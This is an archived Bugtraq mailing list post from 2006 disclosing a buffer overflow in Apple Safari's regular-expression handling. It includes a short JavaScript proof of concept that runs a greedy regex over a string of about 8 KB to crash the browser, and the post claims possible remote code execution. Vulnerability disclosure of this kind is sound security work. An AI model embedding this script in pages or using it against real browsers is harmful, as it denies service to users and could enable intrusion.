Bugtraq mailing list archives
Apple Safari "match" Buffer Overflow Vulnerability
From: jbh_cg () yahoo fr
Date: 14 Nov 2006 01:08:12 -0000
The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4. A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution. <script> var reg = /(.)*/; var z = 'Z'; while (z.length <= 8192) z+=z; var boum = reg.exec(z); </script>
Current thread:
- Apple Safari "match" Buffer Overflow Vulnerability jbh_cg (Nov 14)
- Re: Apple Safari "match" Buffer Overflow Vulnerability J. Oquendo (Nov 16)